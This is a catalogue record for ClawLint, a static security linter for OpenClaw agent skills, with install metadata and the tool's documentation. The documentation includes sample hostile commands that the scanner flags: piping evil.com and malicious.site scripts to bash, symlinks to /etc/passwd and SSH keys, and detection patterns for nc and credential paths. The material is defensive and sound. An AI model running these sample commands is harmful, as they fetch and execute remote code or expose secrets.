{
  "schemaVersion": "1.0",
  "item": {
    "slug": "claw-lint",
    "name": "Claw-lint",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "canonicalUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadMode": "redirect",
    "downloadUrl": "/downloads/claw-lint",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=claw-lint",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "installMethod": "Manual import",
    "extraction": "Extract archive",
    "prerequisites": [
      "OpenClaw"
    ],
    "packageFormat": "ZIP package",
    "includedAssets": [
      ".gitignore",
      "SKILL.md",
      "bin/claw-lint.sh"
    ],
    "primaryDoc": "SKILL.md",
    "quickSetup": [
      "Download the package from Yavira.",
      "Extract the archive and review SKILL.md first.",
      "Import or place the package into your OpenClaw setup."
    ],
    "agentAssist": {
      "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
      "steps": [
        "Download the package from Yavira.",
        "Extract it into a folder your agent can access.",
        "Paste one of the prompts below and point your agent at the extracted folder."
      ],
      "prompts": [
        {
          "label": "New install",
          "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete."
        },
        {
          "label": "Upgrade existing",
          "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run."
        }
      ]
    },
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/claw-lint"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    },
    "downloadPageUrl": "https://openagent3.xyz/downloads/claw-lint",
    "agentPageUrl": "https://openagent3.xyz/skills/claw-lint/agent",
    "manifestUrl": "https://openagent3.xyz/skills/claw-lint/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/claw-lint/agent.md"
  },
  "documentation": {
    "source": "clawhub",
    "primaryDoc": "SKILL.md",
    "sections": [
      {
        "title": "ClawLint",
        "body": "Security linter for OpenClaw skills\n\nRuns a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.\n\nWith 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run."
      },
      {
        "title": "Summary",
        "body": "ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines."
      },
      {
        "title": "What It Does",
        "body": "Risk scoring — assigns a numeric risk score (0-100) based on detected patterns\nAudit flags — identifies suspicious behaviors (remote execution, secret access, etc.)\nInventory mode — optional SHA256 hashing of all files for change detection\nJSON output — machine-readable results (requires Python 3)\nNo execution — static analysis only, safe to run on untrusted skills"
      },
      {
        "title": "Scan all skills (summary view)",
        "body": "{baseDir}/bin/claw-lint.sh"
      },
      {
        "title": "Scan one specific skill",
        "body": "{baseDir}/bin/claw-lint.sh --skill <skill-name>\n\nExample: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher"
      },
      {
        "title": "Full inventory with SHA256 hashes",
        "body": "{baseDir}/bin/claw-lint.sh --full --skill <skill-name>"
      },
      {
        "title": "JSON output (requires Python 3)",
        "body": "{baseDir}/bin/claw-lint.sh --format json"
      },
      {
        "title": "Options",
        "body": "Flag\tDescription\n--skill <name>\tScan only the specified skill\n--full\tInclude SHA256 inventory of all files\n--format json\tOutput as JSON (needs python3)\n--min-score <N>\tShow only skills with risk score ≥ N\n--strict\tPrioritize high-severity patterns\n--max-bytes <N>\tSkip files larger than N bytes (default: 2MB)"
      },
      {
        "title": "Risk Score",
        "body": "0-30: Low risk (common patterns, minimal concerns)\n31-60: Medium risk (network access, file operations)\n61-100: High risk (remote execution, credential access, system tampering)"
      },
      {
        "title": "Common Flags",
        "body": "pipes_remote_to_shell — downloads and executes remote code\ndownloads_remote_content — fetches external files\nhas_executables — contains binary files\nuses_ssh_or_scp — SSH/SCP operations\ncontains_symlinks — symbolic links present"
      },
      {
        "title": "Example Output",
        "body": "SCORE  SKILL                FILES  SIZE     FLAGS\n-----  -----                -----  ----     -----\n57     hashnode-publisher   2      1.1KB    downloads_remote_content,pipes_remote_to_shell\n45     ec2-health-monitor   2      1.9KB    pipes_remote_to_shell"
      },
      {
        "title": "Risk Scoring Details",
        "body": "ClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:\n\nScore Range\tClassification\tDescription\n0-20\tLow Risk\tStandard file operations, no suspicious patterns\n21-50\tMedium Risk\tNetwork calls or external dependencies detected\n51-80\tHigh Risk\tMultiple suspicious patterns or obfuscation detected\n81-100\tCritical\tRemote execution, secret access, or privilege escalation"
      },
      {
        "title": "Scoring Factors",
        "body": "+25 points: Remote execution patterns (curl | bash, wget -O-, nc)\n+30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)\n+20 points: Privilege escalation (sudo, setuid, chmod +s)\n+15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)\n+10 points: External network calls (curl, wget, http requests)\n+10 points: File system operations outside skill directory\n+5 points: Use of /tmp or world-writable directories"
      },
      {
        "title": "pipes_remote_to_shell",
        "body": "Downloads and executes external code without verification.\n\nExamples:\n\ncurl https://evil.com/script.sh | bash\nwget -O- https://malicious.site/payload | sh\n\nRisk: Critical. Remote code execution vector for malware."
      },
      {
        "title": "downloads_remote_content",
        "body": "Fetches external files or data from the internet.\n\nExamples:\n\ncurl -O https://example.com/file.tar.gz\nwget https://cdn.example.com/data.json\n\nRisk: Medium-High. Potential supply chain attack or data exfiltration."
      },
      {
        "title": "has_executables",
        "body": "Contains compiled binary files (not shell scripts).\n\nExamples:\n\nELF binaries\nCompiled programs\n\nRisk: Medium. Harder to audit, may contain hidden functionality."
      },
      {
        "title": "uses_ssh_or_scp",
        "body": "Performs SSH/SCP operations.\n\nExamples:\n\nssh user@remote.host \"command\"\nscp file.txt user@remote:/path/\n\nRisk: Medium. Potential for unauthorized remote access or data transfer."
      },
      {
        "title": "contains_symlinks",
        "body": "Includes symbolic links that may point outside skill directory.\n\nExamples:\n\nln -s /etc/passwd exposed_file\nln -s ~/.ssh/id_rsa key_link\n\nRisk: Low-Medium. May expose sensitive files or create confusion."
      },
      {
        "title": "Requirements",
        "body": "Bash 4.0+\nStandard Unix tools: find, grep, awk, sha256sum, stat\nPython 3 (optional, for JSON output only)\n\nWorks on Ubuntu/Debian without sudo. Designed for EC2 and similar environments."
      },
      {
        "title": "Why Use This?",
        "body": "Audit skills before installation\nDetect backdoors or malicious patterns in community skills\nTrack changes to installed skills with SHA256 inventory\nEnforce security policies in automated pipelines"
      },
      {
        "title": "Terminal Output (Default)",
        "body": "Human-readable table format with color-coded risk scores (when terminal supports colors)."
      },
      {
        "title": "JSON Output (--format json)",
        "body": "Machine-readable structure for integration with CI/CD pipelines:\n\n{\n  \"scan_date\": \"2026-02-13T14:50:00Z\",\n  \"skills_scanned\": 12,\n  \"high_risk_count\": 2,\n  \"results\": [\n    {\n      \"skill_name\": \"hashnode-publisher\",\n      \"risk_score\": 57,\n      \"file_count\": 2,\n      \"total_size\": \"1.1KB\",\n      \"flags\": [\"downloads_remote_content\", \"pipes_remote_to_shell\"],\n      \"files\": [\n        {\n          \"path\": \"bin/publish.sh\",\n          \"sha256\": \"a1b2c3d4...\",\n          \"size\": 896\n        }\n      ]\n    }\n  ]\n}"
      },
      {
        "title": "Regular Audits",
        "body": "Run ClawLint after installing or updating skills:\n\n{baseDir}/bin/claw-lint.sh --min-score 50"
      },
      {
        "title": "Baseline Inventory",
        "body": "Create a security baseline for production environments:\n\n{baseDir}/bin/claw-lint.sh --full --format json > baseline.json\n\nRe-run periodically and diff against baseline to detect tampering."
      },
      {
        "title": "CI/CD Integration",
        "body": "Add to your deployment pipeline:\n\n# Fail build if any skill scores above 60\n{baseDir}/bin/claw-lint.sh --format json | python3 -c \"\nimport json, sys\ndata = json.load(sys.stdin)\nhigh_risk = [s for s in data['results'] if s['risk_score'] > 60]\nif high_risk:\n    print(f'❌ {len(high_risk)} high-risk skills detected')\n    sys.exit(1)\n\""
      },
      {
        "title": "Whitelist Trusted Skills",
        "body": "For known-safe skills with legitimate flags, document exceptions:\n\n# Example: hashnode-publisher needs network access\n{baseDir}/bin/claw-lint.sh --skill hashnode-publisher\n# Expected score: 45-60 (downloads_remote_content is legitimate)"
      },
      {
        "title": "Limitations",
        "body": "Static analysis only — cannot detect runtime behavior or dynamically generated code\nPattern-based — may have false positives for legitimate use cases\nNo sandbox — does not execute or test skills\nLocal files only — scans installed skills, not ClawHub packages before install\n\nFor comprehensive security, combine ClawLint with:\n\nManual code review for critical skills\nVirusTotal scanning for executables\nRuntime monitoring and sandboxing\nRegular security updates"
      },
      {
        "title": "Contributing",
        "body": "Report false positives or suggest new detection patterns at the OpenClaw security repository."
      },
      {
        "title": "License",
        "body": "MIT License - Free to use, modify, and distribute."
      }
    ]
  },
  "trust": {
    "sourceLabel": "tencent",
    "provenanceUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "publisherUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "owner": "ParthGhumatkar",
    "version": "1.0.4",
    "license": null,
    "verificationStatus": "Indexed source record"
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/claw-lint",
    "downloadUrl": "https://openagent3.xyz/downloads/claw-lint",
    "agentUrl": "https://openagent3.xyz/skills/claw-lint/agent",
    "manifestUrl": "https://openagent3.xyz/skills/claw-lint/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/claw-lint/agent.md"
  }
}